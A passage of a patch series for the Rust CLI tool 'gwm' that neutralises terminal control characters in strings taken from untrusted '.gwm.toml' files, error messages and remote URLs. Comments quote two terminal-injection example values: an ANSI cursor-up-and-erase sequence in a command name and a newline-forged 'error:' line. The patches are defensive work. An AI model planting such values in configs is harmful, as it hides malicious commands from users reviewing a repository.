       // resolver matches on, and two distinct names must not look shadowed
       // just because they neutralise to the same string.
       let shadowed = resolved.repo.contains_key(name);

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -4294,7 +4294,7 @@ pub fn labels_diff_lines(slug: &str, declared: &[labels::LabelSpec], diff: &Labe
   )];
   for spec in &diff.to_create {
     lines.push(format!(
-      "  + {:<20} (will create — color #{})",
+      "  + {:<20} (will create, color #{})",
       clean(&spec.name),
       clean(&spec.color)
     ));
@@ -4430,7 +4430,7 @@ pub fn milestones_diff_lines(slug: &str, declared: &[milestones::MilestoneSpec],
   for spec in &diff.to_create {
     let due = spec.due_on.as_deref().unwrap_or("no due date");
     lines.push(format!(
-      "  + {:<20} (will create — state {}, due {})",
+      "  + {:<20} (will create, state {}, due {})",
       clean(&spec.title),
       spec.state.as_str(),
       clean(due)
@@ -4707,7 +4707,7 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
       }
       other => {
         println!(
-          "unrecognised answer '{}' — answer y, N, or show",
+          "unrecognised answer '{}': answer y, N, or show",
           crate::naming::sanitise_for_terminal(other)
         );
       }
@@ -4732,7 +4732,7 @@ fn print_bootstrap_summary(cfg: &Config) {
 pub fn bootstrap_summary_lines(cfg: &Config) -> Vec<String> {
   let bs = &cfg.bootstrap;
   if bs.copy.is_empty() && bs.command.is_empty() && bs.guard.is_empty() && bs.no_symlink.is_empty() {
-    return vec!["     bootstrap surface: (empty — no copies/commands/guards/no_symlinks declared)".to_string()];
+    return vec!["     bootstrap surface: (empty, no copies/commands/guards/no_symlinks declared)".to_string()];
   }
   // Issue #473: every field below is verbatim text from a file the user has
   // NOT trusted, which is the whole premise of the prompt this feeds. Left

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -3446,18 +3446,24 @@ fn cmd_statusline(socket: Option<PathBuf>, watch: bool) -> Result<()> {
 }
 
 fn print_doctor_report(report: &doctor::DoctorReport) {
+  // Issue #473: several checks quote config-supplied strings in their detail
+  // (`base directory writable` renders `[worktree].base`, the guard checks
+  // name their entries). Neutralised here, at the single sink, rather than in
+  // each `Check::ok` / `failed` call — so a check added later is covered
+  // without anyone having to remember.
+  let clean = crate::naming::sanitise_for_terminal;
   for c in &report.checks {
     let sigil = match c.status {
       CheckStatus::Ok => "✓",
       CheckStatus::Warning => "!",
       CheckStatus::Failed => "✗",
     };
-    println!("{} {}", sigil, c.name);
+    println!("{} {}", sigil, clean(&c.name));
     if !c.detail.is_empty() {
-      println!("    {}", c.detail);
+      println!("    {}", clean(&c.detail));
     }
     if let Some(hint) = &c.fix_hint {
-      println!("    → {}", hint);
+      println!("    → {}", clean(hint));
     }
   }
 }
@@ -3495,8 +3501,15 @@ fn cmd_types(gitmoji_flag: bool) -> Result<()> {
   // When the gitmoji columns are active, align the shortcode column on
   // the widest shortcode (`:white_check_mark:`, currently 18 chars) so
   // the description column doesn't drift between rows.
+  // Issue #473: `description` (from `[[branch_types]]`) and the shortcodes
+  // (from `[gitmoji]`) are free text out of an unvetted `.gwm.toml`; `name` is
+  // not, it is already constrained to `^[a-z]+$` by `validate_branch_types`.
+  // Widths are measured on the neutralised strings so the columns still line
+  // up — a replaced C1 control character is two bytes narrower than the one
+  // it replaced.
+  let clean = crate::naming::sanitise_for_terminal;
   let sc_width = match &gitmoji_map {
-    Some(map) => map.iter().map(|(_, sc)| sc.len()).max().unwrap_or(0).max(10),
+    Some(map) => map.iter().map(|(_, sc)| clean(sc).len()).max().unwrap_or(0).max(10),
     None => 0,
   };
 
@@ -3506,20 +3519,20 @@ fn cmd_types(gitmoji_flag: bool) -> Result<()> {
         // Two extra columns: unicode glyph (1 cell wide, padded for
         // BMP code points; emoji ZWJ sequences would break alignment
         // but our built-in set is all single-glyph) + shortcode.
-        let shortcode = map.get(&t.name).unwrap_or(":question:");
-        let unicode = gitmoji::shortcode_to_unicode(shortcode);
+        let shortcode = clean(map.get(&t.name).unwrap_or(":question:"));
+        let unicode = gitmoji::shortcode_to_unicode(&shortcode);
         println!(
           "  {:<width$}  {}  {:<sw$}  {}",
           t.name,
           unicode,
           shortcode,
-          t.description,
+          clean(&t.description),
           width = width,
           sw = sc_width,
         );
       }
       None => {
-        println!("  {:<width$}  {}", t.name, t.description, width = width);
+        println!("  {:<width$}  {}", t.name, clean(&t.description), width = width);
       }
     }
   }
@@ -3635,7 +3648,11 @@ fn cmd_commit_prefix(branch_override: Option<String>, unicode: bool) -> Result<(
 
   let map = gitmoji::load(workdir.as_deref())?;
   let prefix = gitmoji::resolve_prefix(&map, &spec, unicode);
-  println!("{}", prefix);
+  // Issue #473: the prefix is assembled from `[gitmoji]` shortcodes read out
+  // of `.gwm.toml`, and this command is ungated by design — shell prompts and
+  // the bundled commit-msg hook call it on every commit, in whatever repo the
+  // user happens to be sitting in.
+  println!("{}", crate::naming::sanitise_for_terminal(&prefix));
   Ok(())
 }
 
@@ -4475,6 +4492,10 @@ fn cmd_trust_show() -> Result<()> {
   println!("ledger path: {}", path.display());
   match std::fs::read_to_string(&path) {
     Ok(body) => {
+      // Issue #473: the ledger records one origin key per trusted repo, and
+      // an origin is a remote URL that arrived with a clone. Block variant —
+      // the ledger is a file and its rows are its shape.
+      let body = crate::naming::sanitise_block_for_terminal(&body);
       println!("---");
       print!("{}", body);
       if !body.ends_with('\n') {
@@ -4570,7 +4591,10 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
   println!();
   println!("gwm: this repo's .gwm.toml has not been trusted yet.");
   println!("     path   : {}", cfg_path.display());
-  println!("     origin : {}", origin);
+  // Issue #473: `origin` is a remote URL out of `.git/config`, which travels
+  // with a clone just like `.gwm.toml` does. Nothing here has been vetted yet
+  // — that is what the prompt below is asking.
+  println!("     origin : {}", crate::naming::sanitise_for_terminal(origin));
   println!("     hash   : {}", sha);
   if let Some(cfg) = parsed.as_ref() {
     print_bootstrap_summary(cfg);
@@ -4592,6 +4616,11 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
       "y" | "yes" => return Ok(true),
       "n" | "no" | "" => return Ok(false),
       "show" | "s" => {
+        // Issue #473: the block variant, because this IS the file and its
+        // line breaks are its shape. Neutralising the rest is not "breaking
+        // raw" — an escape sequence buried in the body defeats the very
+        // inspection `show` exists to provide.
+        let body = crate::naming::sanitise_block_for_terminal(&body);
         println!("---");
         print!("{}", body);
         if !body.ends_with('\n') {
@@ -4600,7 +4629,10 @@ fn prompt_user(cfg_path: &Path, bytes: &[u8], origin: &str, sha: &str) -> Result
         println!("---");
       }
       other => {
-        println!("unrecognised answer '{}' — answer y, N, or show", other);
+        println!(
+          "unrecognised answer '{}' — answer y, N, or show",
+          crate::naming::sanitise_for_terminal(other)
+        );
       }
     }
   }
@@ -4625,23 +4657,29 @@ pub fn bootstrap_summary_lines(cfg: &Config) -> Vec<String> {
   if bs.copy.is_empty() && bs.command.is_empty() && bs.guard.is_empty() && bs.no_symlink.is_empty() {
     return vec!["     bootstrap surface: (empty — no copies/commands/guards/no_symlinks declared)".to_string()];
   }
+  // Issue #473: every field below is verbatim text from a file the user has
+  // NOT trusted — that is the whole premise of the prompt this feeds. Left
+  // raw, `\u{1b}[1A\u{1b}[2K` in a `[[bootstrap.command]]` name walks the
+  // cursor up and erases the row above, so the malicious `run` line can
+  // delete the very evidence the summary exists to show.
+  let clean = crate::naming::sanitise_for_terminal;
   let mut lines = vec!["     bootstrap surface:".to_string()];
   for c in &bs.copy {
-    lines.push(format!("       - copy   {} → {}", c.from, c.to));
+    lines.push(format!("       - copy   {} → {}", clean(&c.from), clean(&c.to)));
   }
   for g in &bs.guard {
     lines.push(format!(
       "       - guard  {} (on_match={}, deny={} pattern(s))",
-      g.name,
+      clean(&g.name),
       g.on_match,
       g.deny_patterns.len()
     ));
   }
   for ns in &bs.no_symlink {
-    lines.push(format!("       - no-symlink {}", ns.path));
+    lines.push(format!("       - no-symlink {}", clean(&ns.path)));
   }
   for c in &bs.command {
-    lines.push(format!("       - run    {} ({})", c.name, c.run));
+    lines.push(format!("       - run    {} ({})", clean(&c.name), clean(&c.run)));
   }
   lines
 }
@@ -4695,6 +4733,13 @@ fn cmd_aliases_list() -> Result<()> {
 
   let resolved = crate::aliases::load(repo_workdir.as_deref(), None)?;
 
+  // Issue #473: repo and user alias tables are arbitrary key/value text from
+  // a `.gwm.toml` this command reads WITHOUT the trust gate — auditing an
+  // unfamiliar repo's aliases before running anything is exactly what it is
+  // for. Built-ins are compiled in and need no cleaning, but they share the
+  // helper so a future built-in read from a file cannot slip through.
+  let clean = crate::naming::sanitise_for_terminal;
+
   // built-in section ---------------------------------------------------
   println!("built-in:");
   if resolved.built_in.is_empty() {
@@ -4702,7 +4747,7 @@ fn cmd_aliases_list() -> Result<()> {
   } else {
     let width = resolved.built_in.iter().map(|e| e.name.len()).max().unwrap_or(2).max(2);
     for e in &resolved.built_in {
-      println!("  {:<width$} → {}", e.name, e.expansion, width = width);
+      println!("  {:<width$} → {}", clean(e.name), clean(e.expansion), width = width);
     }
   }
 
@@ -4713,9 +4758,9 @@ fn cmd_aliases_list() -> Result<()> {
   } else if resolved.repo.is_empty() {
     println!("  (none declared)");
   } else {
-    let width = resolved.repo.keys().map(|k| k.len()).max().unwrap_or(2).max(2);
+    let width = resolved.repo.keys().map(|k| clean(k).len()).max().unwrap_or(2).max(2);
     for (name, expansion) in &resolved.repo {
-      println!("  {:<width$} → {}", name, expansion, width = width);
+      println!("  {:<width$} → {}", clean(name), clean(expansion), width = width);
     }
   }
 
@@ -4728,13 +4773,22 @@ fn cmd_aliases_list() -> Result<()> {
   if resolved.user.is_empty() {
     println!("  (none declared)");
   } else {
-    let width = resolved.user.keys().map(|k| k.len()).max().unwrap_or(2).max(2);
+    let width = resolved.user.keys().map(|k| clean(k).len()).max().unwrap_or(2).max(2);
     for (name, expansion) in &resolved.user {
       // Mark entries shadowed by a repo declaration so the user can
       // see why a `gwm <name>` does not pick up the user expansion.
+      // Shadowing is probed on the raw name — that is the identity the
+      // resolver matches on, and two distinct names must not look shadowed
+      // just because they neutralise to the same string.
       let shadowed = resolved.repo.contains_key(name);
       let suffix = if shadowed { "  (shadowed by repo)" } else { "" };
-      println!("  {:<width$} → {}{}", name, expansion, suffix, width = width);
+      println!(
+        "  {:<width$} → {}{}",
+        clean(name),
+        clean(expansion),
+        suffix,
+        width = width
+      );
     }
   }
 

--- a/src/cli.rs
+++ b/src/cli.rs
@@ -4252,14 +4252,33 @@ fn labels_forge(config: &Config) -> Result<std::sync::Arc<dyn forge::Forge>> {
 }
 
 fn print_labels_diff(slug: &str, declared: &[labels::LabelSpec], diff: &LabelDiff) {
+  for line in labels_diff_lines(slug, declared, diff) {
+    println!("{}", line);
+  }
+}
+
+/// The rows `gwm labels list` / `push --dry-run` print, as values (issue
+/// #473). Same seam and same reason as [`milestones_diff_lines`].
+///
+/// A declared `name` is the least exposed field here: `labels::
+/// validate_label_name` already rejects it at load. But it rejects
+/// `is_ascii_control` only, which leaves the C1 range (U+0080..U+009F, CSI
+/// among them) through, and `remote.name` / `slug` come off the forge rather
+/// than the config and are validated by nobody.
+pub fn labels_diff_lines(slug: &str, declared: &[labels::LabelSpec], diff: &LabelDiff) -> Vec<String> {
+  let clean = crate::naming::sanitise_for_terminal;
   let (n_create, n_update, n_match, n_extra) = diff.counts();
-  println!(
+  let mut lines = vec![format!(
     "declared in .gwm.toml: {} labels — diff against {}:",
     declared.len(),
-    slug
-  );
+    clean(slug)
+  )];
   for spec in &diff.to_create {
-    println!("  + {:<20} (will create — color #{})", spec.name, spec.color);
+    lines.push(format!(
+      "  + {:<20} (will create — color #{})",
+      clean(&spec.name),
+      clean(&spec.color)
+    ));
   }
   for upd in &diff.to_update {
     let detail = match (&upd.previous_color, &upd.previous_description) {
@@ -4267,15 +4286,16 @@ fn print_labels_diff(slug: &str, declared: &[labels::LabelSpec], diff: &LabelDif
       (None, Some(_)) => "description changed".into(),
       _ => "diff".into(),
     };
-    println!("  ~ {:<20} ({})", upd.spec.name, detail);
+    lines.push(format!("  ~ {:<20} ({})", clean(&upd.spec.name), clean(&detail)));
   }
   for spec in &diff.matching {
-    println!("  = {:<20} (match)", spec.name);
+    lines.push(format!("  = {:<20} (match)", clean(&spec.name)));
   }
   for remote in &diff.extra_on_remote {
-    println!("  - {:<20} (on remote, not in config)", remote.name);
+    lines.push(format!("  - {:<20} (on remote, not in config)", clean(&remote.name)));
   }
-  println!("{}", labels::diff_summary_line(n_create, n_update, n_match, n_extra));
+  lines.push(labels::diff_summary_line(n_create, n_update, n_match, n_extra));
+  lines
 }
 
 // ---- Milestones commands (issue #82) ------------------------------------
@@ -4367,20 +4387,35 @@ fn load_milestones_config() -> Result<Config> {
 }
 
 fn print_milestones_diff(slug: &str, declared: &[milestones::MilestoneSpec], diff: &MilestoneDiff) {
+  for line in milestones_diff_lines(slug, declared, diff) {
+    println!("{}", line);
+  }
+}
+
+/// The rows `gwm milestones list` / `push --dry-run` print, as values rather
+/// than `println!` side effects (issue #473).
+///
+/// A value because the printer is only reachable after a live forge round
+/// trip (`fetch_remote_milestones`), so there is no way to assert on it from a
+/// test without mocking `gh`. Unlike a label name, a milestone `title` is free
+/// text that nothing validates on load, and `gwm milestones list` reads
+/// `.gwm.toml` without the trust gate.
+pub fn milestones_diff_lines(slug: &str, declared: &[milestones::MilestoneSpec], diff: &MilestoneDiff) -> Vec<String> {
+  let clean = crate::naming::sanitise_for_terminal;
   let (n_create, n_update, n_match, n_extra) = diff.counts();
-  println!(
+  let mut lines = vec![format!(
     "declared in .gwm.toml: {} milestones — diff against {}:",
     declared.len(),
-    slug
-  );
+    clean(slug)
+  )];
   for spec in &diff.to_create {
     let due = spec.due_on.as_deref().unwrap_or("no due date");
-    println!(
+    lines.push(format!(
       "  + {:<20} (will create — state {}, due {})",
-      spec.title,
+      clean(&spec.title),
       spec.state.as_str(),
-      due
-    );
+      clean(due)
+    ));
   }
   for upd in &diff.to_update {
     let detail = match (&upd.previous_due_on, &upd.previous_state, &upd.previous_description) {
@@ -4389,15 +4424,20 @@ fn print_milestones_diff(slug: &str, declared: &[milestones::MilestoneSpec], dif
       (None, None, Some(_)) => "description changed".into(),
       _ => "diff".into(),
     };
-    println!("  ~ {:<20} ({})", upd.spec.title, detail);
+    lines.push(format!("  ~ {:<20} ({})", clean(&upd.spec.title), clean(&detail)));
   }
   for spec in &diff.matching {
-    println!("  = {:<20} (match)", spec.title);
+    lines.push(format!("  = {:<20} (match)", clean(&spec.title)));
   }
   for remote in &diff.extra_on_remote {
-    println!("  - {:<20} (#{} on remote, not in config)", remote.title, remote.number);
+    lines.push(format!(
+      "  - {:<20} (#{} on remote, not in config)",
+      clean(&remote.title),
+      remote.number
+    ));
   }
-  println!("{}", labels::diff_summary_line(n_create, n_update, n_match, n_extra));
+  lines.push(labels::diff_summary_line(n_create, n_update, n_match, n_extra));
+  lines
 }
 
 // ---- Trust ledger commands (issue #95) ----------------------------------

--- a/src/config_cli.rs
+++ b/src/config_cli.rs
@@ -186,7 +186,11 @@ pub fn validate() -> Result<()> {
   if let Some(warning) =
     crate::naming::branch_pattern_warning(&effective.worktree.branch_pattern, &worktree::repo_name(&repo), &types)
   {
-    eprintln!("warning: {}", warning);
+    // Issue #473: `branch_pattern_warning` already neutralises the pattern it
+    // quotes, but it also embeds the repo name, and this `eprintln!` bypasses
+    // the sink in `main` (it is a warning, not a returned error). One row, so
+    // the row variant.
+    eprintln!("warning: {}", crate::naming::sanitise_for_terminal(&warning));
   }
   Ok(())
 }
@@ -501,14 +505,14 @@ fn render_segment(segment: &Segment) -> String {
 fn config_de_error(path: &Path, raw: &str, err: toml::de::Error) -> GwmError {
   let msg = enrich_schema_hint(err.to_string());
   match err.span() {
-    Some(span) => GwmError::Config(format!(
+    Some(span) => GwmError::ConfigDiagnostic(format!(
       "{}: error at line {}, col {}: {}",
       path.display(),
       line_col(raw, span.start).0,
       line_col(raw, span.start).1,
       msg
     )),
-    None => GwmError::Config(format!("{}: {}", path.display(), msg)),
+    None => GwmError::ConfigDiagnostic(format!("{}: {}", path.display(), msg)),
   }
 }
 
@@ -522,14 +526,14 @@ fn enrich_schema_hint(message: String) -> String {
 
 fn config_parse_error(path: &Path, raw: &str, err: toml_edit::TomlError) -> GwmError {
   match err.span() {
-    Some(span) => GwmError::Config(format!(
+    Some(span) => GwmError::ConfigDiagnostic(format!(
       "{}: error at line {}, col {}: {}",
       path.display(),
       line_col(raw, span.start).0,
       line_col(raw, span.start).1,
       err
     )),
-    None => GwmError::Config(format!("{}: {}", path.display(), err)),
+    None => GwmError::ConfigDiagnostic(format!("{}: {}", path.display(), err)),
   }
 }
 

--- a/src/config_cli.rs
+++ b/src/config_cli.rs
@@ -148,7 +148,14 @@ pub fn list(prefix: Option<&str>) -> Result<()> {
       .map(|p| key == p || key.starts_with(&format!("{}.", p)) || key.starts_with(&format!("{}[", p)))
       .unwrap_or(true)
     {
-      println!("{} = {}", key, value);
+      // Issue #473: the *value* is already escaped by `format_list_value`'s
+      // `{:?}`, but the key is not — and a key is attacker-controlled wherever
+      // the schema is a map rather than fixed fields (`[aliases]`,
+      // `[forge_hosts]`, `[exec.profiles]`, `[clean.profiles]`, `[tui.keys]`).
+      // Sanitised at the print site rather than inside `flatten_value`, whose
+      // other callers compare keys across config layers to attribute a source
+      // and must keep seeing them byte-for-byte.
+      println!("{} = {}", crate::naming::sanitise_for_terminal(&key), value);
     }
   }
   Ok(())
@@ -470,7 +477,11 @@ fn remove_value(table: &mut Table, segments: &[Segment]) -> Result<()> {
 
 fn format_get_value(value: &toml::Value) -> String {
   match value {
-    toml::Value::String(s) => s.clone(),
+    // Issue #473: `gwm config get` prints the string bare (that is its
+    // contract — the output is meant to be pipeable), so unlike the
+    // `format_list_value` path below it gets no incidental protection from
+    // `Debug`'s escaping. Neutralise the control bytes here instead.
+    toml::Value::String(s) => crate::naming::sanitise_for_terminal(s),
     _ => crate::config::format_list_value(value),
   }
 }

--- a/src/config_cli.rs
+++ b/src/config_cli.rs
@@ -505,14 +505,14 @@ fn render_segment(segment: &Segment) -> String {
 fn config_de_error(path: &Path, raw: &str, err: toml::de::Error) -> GwmError {
   let msg = enrich_schema_hint(err.to_string());
   match err.span() {
-    Some(span) => GwmError::ConfigDiagnostic(format!(
+    Some(span) => GwmError::Config(format!(
       "{}: error at line {}, col {}: {}",
       path.display(),
       line_col(raw, span.start).0,
       line_col(raw, span.start).1,
       msg
     )),
-    None => GwmError::ConfigDiagnostic(format!("{}: {}", path.display(), msg)),
+    None => GwmError::Config(format!("{}: {}", path.display(), msg)),
   }
 }
 
@@ -526,14 +526,14 @@ fn enrich_schema_hint(message: String) -> String {
 
 fn config_parse_error(path: &Path, raw: &str, err: toml_edit::TomlError) -> GwmError {
   match err.span() {
-    Some(span) => GwmError::ConfigDiagnostic(format!(
+    Some(span) => GwmError::Config(format!(
       "{}: error at line {}, col {}: {}",
       path.display(),
       line_col(raw, span.start).0,
       line_col(raw, span.start).1,
       err
     )),
-    None => GwmError::ConfigDiagnostic(format!("{}: {}", path.display(), err)),
+    None => GwmError::Config(format!("{}: {}", path.display(), err)),
   }
 }
 

--- a/src/config_cli.rs
+++ b/src/config_cli.rs
@@ -149,7 +149,7 @@ pub fn list(prefix: Option<&str>) -> Result<()> {
       .unwrap_or(true)
     {
       // Issue #473: the *value* is already escaped by `format_list_value`'s
-      // `{:?}`, but the key is not — and a key is attacker-controlled wherever
+      // `{:?}`, but the key is not, and a key is attacker-controlled wherever
       // the schema is a map rather than fixed fields (`[aliases]`,
       // `[forge_hosts]`, `[exec.profiles]`, `[clean.profiles]`, `[tui.keys]`).
       // Sanitised at the print site rather than inside `flatten_value`, whose
@@ -482,7 +482,7 @@ fn remove_value(table: &mut Table, segments: &[Segment]) -> Result<()> {
 fn format_get_value(value: &toml::Value) -> String {
   match value {
     // Issue #473: `gwm config get` prints the string bare (that is its
-    // contract — the output is meant to be pipeable), so unlike the
+    // contract, the output is meant to be pipeable), so unlike the
     // `format_list_value` path below it gets no incidental protection from
     // `Debug`'s escaping. Neutralise the control bytes here instead.
     toml::Value::String(s) => crate::naming::sanitise_for_terminal(s),

--- a/src/error.rs
+++ b/src/error.rs
@@ -99,20 +99,6 @@ pub enum GwmError {
   #[error("config error: {0}")]
   Config(String),
 
-  /// A config error whose message **is** a rendered diagnostic: `toml`'s
-  /// caret-under-the-column snippet, quoting the offending source line
-  /// (issue #473). Renders identically to [`GwmError::Config`]; the variant
-  /// exists so the process-wide stderr sink can tell the two apart.
-  ///
-  /// The distinction is a security one, not a cosmetic one. Every other
-  /// message is one line of prose that may *quote* a config value, so the
-  /// sink flattens it and an unvetted `.gwm.toml` cannot forge a second line
-  /// that reads like a gwm diagnostic. These two carry line breaks that are
-  /// their own meaning, so they keep them. See
-  /// [`GwmError::is_rendered_diagnostic`].
-  #[error("config error: {0}")]
-  ConfigDiagnostic(String),
-
   /// Issue #105: HEAD is unborn (no commits yet) or detached when a
   /// command that needs the current branch shorthand is invoked.
   /// Split out of `Other` so callers (and the TUI status line) can
@@ -173,27 +159,6 @@ pub enum GwmError {
 
   #[error("{0}")]
   Other(String),
-}
-
-impl GwmError {
-  /// Whether this error's message is a **rendered diagnostic** whose line
-  /// breaks carry meaning, rather than one line of prose (issue #473).
-  ///
-  /// Read by the process-wide stderr sink in `main` to decide how hard to
-  /// neutralise the message. Errors are the one output path every command
-  /// shares, and most of them quote something out of an unvetted
-  /// `.gwm.toml`: a pattern, a branch type, a guard name. Flattening those
-  /// is what stops a value carrying a `\n` from forging a second line that
-  /// reads like a gwm diagnostic ("error: everything is fine"). The two
-  /// variants below are the exceptions, because `toml` renders a
-  /// caret-under-the-column snippet across several lines and collapsing it
-  /// would gut the one message whose job is to point at the broken line.
-  ///
-  /// Both still lose every other control character, so the exemption is for
-  /// line breaks only.
-  pub fn is_rendered_diagnostic(&self) -> bool {
-    matches!(self, GwmError::TomlParse(_) | GwmError::ConfigDiagnostic(_))
-  }
 }
 
 impl From<anyhow::Error> for GwmError {

--- a/src/error.rs
+++ b/src/error.rs
@@ -99,6 +99,20 @@ pub enum GwmError {
   #[error("config error: {0}")]
   Config(String),
 
+  /// A config error whose message **is** a rendered diagnostic: `toml`'s
+  /// caret-under-the-column snippet, quoting the offending source line
+  /// (issue #473). Renders identically to [`GwmError::Config`]; the variant
+  /// exists so the process-wide stderr sink can tell the two apart.
+  ///
+  /// The distinction is a security one, not a cosmetic one. Every other
+  /// message is one line of prose that may *quote* a config value, so the
+  /// sink flattens it and an unvetted `.gwm.toml` cannot forge a second line
+  /// that reads like a gwm diagnostic. These two carry line breaks that are
+  /// their own meaning, so they keep them. See
+  /// [`GwmError::is_rendered_diagnostic`].
+  #[error("config error: {0}")]
+  ConfigDiagnostic(String),
+
   /// Issue #105: HEAD is unborn (no commits yet) or detached when a
   /// command that needs the current branch shorthand is invoked.
   /// Split out of `Other` so callers (and the TUI status line) can
@@ -159,6 +173,27 @@ pub enum GwmError {
 
   #[error("{0}")]
   Other(String),
+}
+
+impl GwmError {
+  /// Whether this error's message is a **rendered diagnostic** whose line
+  /// breaks carry meaning, rather than one line of prose (issue #473).
+  ///
+  /// Read by the process-wide stderr sink in `main` to decide how hard to
+  /// neutralise the message. Errors are the one output path every command
+  /// shares, and most of them quote something out of an unvetted
+  /// `.gwm.toml`: a pattern, a branch type, a guard name. Flattening those
+  /// is what stops a value carrying a `\n` from forging a second line that
+  /// reads like a gwm diagnostic ("error: everything is fine"). The two
+  /// variants below are the exceptions, because `toml` renders a
+  /// caret-under-the-column snippet across several lines and collapsing it
+  /// would gut the one message whose job is to point at the broken line.
+  ///
+  /// Both still lose every other control character, so the exemption is for
+  /// line breaks only.
+  pub fn is_rendered_diagnostic(&self) -> bool {
+    matches!(self, GwmError::TomlParse(_) | GwmError::ConfigDiagnostic(_))
+  }
 }
 
 impl From<anyhow::Error> for GwmError {

--- a/src/main.rs
+++ b/src/main.rs
@@ -33,14 +33,24 @@ fn main() {
       // way to surface the typo). The dispatcher will re-surface
       // the error if the user runs a subcommand that touches
       // config.
-      eprintln!("warning: failed to load aliases — using raw argv: {}", e);
+      eprintln!(
+        "warning: failed to load aliases — using raw argv: {}",
+        gwm::naming::sanitise_block_for_terminal(&e.to_string())
+      );
       argv
     }
   };
 
   let args = cli::Cli::parse_from(expanded);
   if let Err(e) = cli::run(args) {
-    eprintln!("error: {}", e);
+    // Issue #473: the two stderr sinks of the whole binary, so neutralising
+    // here covers every command by construction rather than one diagnostic at
+    // a time. It is not hypothetical — `toml`'s parse error quotes the
+    // offending source line verbatim, which replays a raw control byte from
+    // an unvetted `.gwm.toml` to the terminal of anyone who so much as runs
+    // `gwm list` inside the repo. The block variant keeps the `\n` that makes
+    // the caret-under-the-column snippet readable.
+    eprintln!("error: {}", gwm::naming::sanitise_block_for_terminal(&e.to_string()));
     std::process::exit(1);
   }
 }

--- a/src/main.rs
+++ b/src/main.rs
@@ -33,7 +33,7 @@ fn main() {
       // way to surface the typo). The dispatcher will re-surface
       // the error if the user runs a subcommand that touches
       // config.
-      eprintln!("warning: failed to load aliases — using raw argv: {}", clean_error(&e));
+      eprintln!("warning: failed to load aliases, using raw argv: {}", clean_error(&e));
       argv
     }
   };

--- a/src/main.rs
+++ b/src/main.rs
@@ -53,19 +53,13 @@ fn main() {
 /// source line verbatim, so an unvetted `.gwm.toml` reaches the terminal of
 /// anyone who so much as runs `gwm list` inside the repo.
 ///
-/// How hard depends on what the message *is*. Most errors are one line of
-/// prose that quotes a config value, so they are flattened: a value carrying
-/// a `\n` must not be able to forge a second line that reads like a gwm
-/// diagnostic. The exception is a rendered diagnostic, whose caret-under-the-
-/// column snippet spans lines by design; see
-/// [`GwmError::is_rendered_diagnostic`].
+/// Line breaks survive, because `toml`'s caret-under-the-column snippet is the
+/// one message whose job is to point at the broken line. What stops a config
+/// value from abusing that is the left margin rather than any judgement about
+/// which message is which: see
+/// [`gwm::naming::sanitise_diagnostic_for_terminal`].
 fn clean_error(e: &gwm::error::GwmError) -> String {
-  let msg = e.to_string();
-  if e.is_rendered_diagnostic() {
-    gwm::naming::sanitise_block_for_terminal(&msg)
-  } else {
-    gwm::naming::sanitise_for_terminal(&msg)
-  }
+  gwm::naming::sanitise_diagnostic_for_terminal(&e.to_string())
 }
 
 /// Resolve the alias chain (built-in + repo + user) and run the

--- a/src/main.rs
+++ b/src/main.rs
@@ -33,25 +33,38 @@ fn main() {
       // way to surface the typo). The dispatcher will re-surface
       // the error if the user runs a subcommand that touches
       // config.
-      eprintln!(
-        "warning: failed to load aliases — using raw argv: {}",
-        gwm::naming::sanitise_block_for_terminal(&e.to_string())
-      );
+      eprintln!("warning: failed to load aliases — using raw argv: {}", clean_error(&e));
       argv
     }
   };
 
   let args = cli::Cli::parse_from(expanded);
   if let Err(e) = cli::run(args) {
-    // Issue #473: the two stderr sinks of the whole binary, so neutralising
-    // here covers every command by construction rather than one diagnostic at
-    // a time. It is not hypothetical — `toml`'s parse error quotes the
-    // offending source line verbatim, which replays a raw control byte from
-    // an unvetted `.gwm.toml` to the terminal of anyone who so much as runs
-    // `gwm list` inside the repo. The block variant keeps the `\n` that makes
-    // the caret-under-the-column snippet readable.
-    eprintln!("error: {}", gwm::naming::sanitise_block_for_terminal(&e.to_string()));
+    eprintln!("error: {}", clean_error(&e));
     std::process::exit(1);
+  }
+}
+
+/// Neutralise an error before it reaches the terminal (issue #473).
+///
+/// These two `eprintln!` are the only stderr sinks in the binary, so doing it
+/// here covers every command by construction rather than one diagnostic at a
+/// time. It is not hypothetical: `toml`'s parse error quotes the offending
+/// source line verbatim, so an unvetted `.gwm.toml` reaches the terminal of
+/// anyone who so much as runs `gwm list` inside the repo.
+///
+/// How hard depends on what the message *is*. Most errors are one line of
+/// prose that quotes a config value, so they are flattened: a value carrying
+/// a `\n` must not be able to forge a second line that reads like a gwm
+/// diagnostic. The exception is a rendered diagnostic, whose caret-under-the-
+/// column snippet spans lines by design; see
+/// [`GwmError::is_rendered_diagnostic`].
+fn clean_error(e: &gwm::error::GwmError) -> String {
+  let msg = e.to_string();
+  if e.is_rendered_diagnostic() {
+    gwm::naming::sanitise_block_for_terminal(&msg)
+  } else {
+    gwm::naming::sanitise_for_terminal(&msg)
   }
 }
 

--- a/src/naming.rs
+++ b/src/naming.rs
@@ -1545,6 +1545,33 @@ pub fn sanitise_for_terminal(s: &str) -> String {
 /// overwrite the line it was printed on). Sanitising these is not "breaking
 /// raw": an escape sequence inside the body defeats the very inspection the
 /// `show` view exists to provide.
+/// Neutralise a **diagnostic** headed for stderr: block-sanitise it, then
+/// indent every line after the first (issue #473).
+///
+/// The indent is the security part, not cosmetics. A diagnostic is one string
+/// that mixes layout `toml` generated with values it decoded out of the repo's
+/// file, and no classification can separate them: the same message carries a
+/// caret-under-the-column snippet AND an ``unknown field `<key>` `` naming a
+/// key the repo chose. Measured, a key written as `"bad\nerror: forged"`
+/// printed a second line at column zero reading exactly like a statement from
+/// gwm.
+///
+/// Owning the left margin makes that impossible without classifying anything:
+/// only the first line starts at column zero, and `\r` is already replaced, so
+/// nothing the config emits can get back there. The snippet stays readable,
+/// which is the whole reason the line breaks survive at all.
+pub fn sanitise_diagnostic_for_terminal(s: &str) -> String {
+  let cleaned = sanitise_block_for_terminal(s);
+  let mut out = String::with_capacity(cleaned.len());
+  for (i, line) in cleaned.split('\n').enumerate() {
+    if i > 0 {
+      out.push_str("\n  ");
+    }
+    out.push_str(line);
+  }
+  out
+}
+
 pub fn sanitise_block_for_terminal(s: &str) -> String {
   s.chars()
     .map(|c| {

--- a/src/naming.rs
